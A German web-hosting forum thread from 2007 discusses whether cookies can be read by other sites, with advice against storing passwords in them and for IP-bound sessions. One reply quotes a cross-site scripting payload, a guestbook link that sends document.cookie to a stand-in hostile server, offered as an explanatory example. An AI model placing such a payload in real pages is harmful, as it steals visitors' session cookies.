Wie sicher sind Cookies?
lima-city → Forum → Die eigene Homepage → Sicherheit im Internet
alt
beitrag
bindung
cross
daten
eintrag
gefahr
gstebuch
inhalt
irgend
jeweiligen nutzers
normalerweise
nutzer
pawort
pc
sache
session
unbefugter nutzer
username
versuchen
-
Wie ist das, kann eine fremde Seite die Cookies auslesen, die ich von meiner Seite an den Nutzer geschickt habe?
-
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage
-
Hallo,
xenodez schrieb:
Wie ist das, kann eine fremde Seite die Cookies auslesen, die ich von meiner Seite an den Nutzer geschickt habe?
nein - normalerweise nicht!
Sebastian
PS: Passwörter würde ich aber trotzdem in Cookies verschlüsseln.
-
Verschlüsseln tu ich die sowieso. Aber es ist ja nunmal nicht völlig unmöglich, Cookies zu manipulieren. Wenn also jemand nen fremdes Cookie auslesen könnte, dann wäre das dennoch eine Gefahr.
-
Ein alter Trick, der aber in keinem Browser mehr funktionieren dürfte, war folgender:
//z.B. ein Eintrag in ein Gästebuch //die Homepage des Benutzers: <a href="javascript:window.location.href='boese_seite.de/?c='+document.cookie">besucht meine Homepage!</a>
So wird der Inhalt des Cookies dann per GET an einen fremden Server geschickt.
(Also Cross-Site-Scripting)
Grundsätzlich kann man Cookies schon als sicher ansehen. Es kommt aber auch darauf an, ob du noch fremde JavaScripte (z.B. Layer Ads) in deiner Seite eingebunden hast und dann könnte z.B. Layer Ads auf die Cookie Daten zugreifen.
(Ich hab es jetzt nicht getestet, aber theoretisch müsste es funktionieren)
Ansonsten ist natürlich noch zu beachten, dass Cookies ganz normale Dateien sind, die ein unbefugter Nutzer eines PCs einfach kopieren und auf dem eigenen Rechner dann als seine eigenen verwenden kann.
Beitrag geändert: 17.7.2007 21:41:57 von bladehunter -
Naja, die Nutzung von Scripten und HTML an sich versuche ich in solchen Bereichen, in denen die Nutzer was eintragen können, zu deaktivieren.
Und gegen das direkte Kopieren der Cookies kann ich ja wohl nicht viel machen.. Das ist dann die Sache des jeweiligen Nutzers. -
Also ich würde prinzipiell keine Sensiblen Daten in einen Cookie schreiben
(Passwort,Username etc. )
Das mittel der Wal ist hier eine Session mit IP Bindung.
Zudem sind Cookies dann doch recht schnell durch irgend welche exploits im Browser abgefragt.
Spätestens über Cross site Scripting oder URL Cloaking lassen sich nach wie vor einige Browser aushebeln. Allerdings ist dass für den Amateurbereich nichtmehr wirklich relevant. -
Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!
lima-city: Gratis werbefreier Webspace für deine eigene Homepage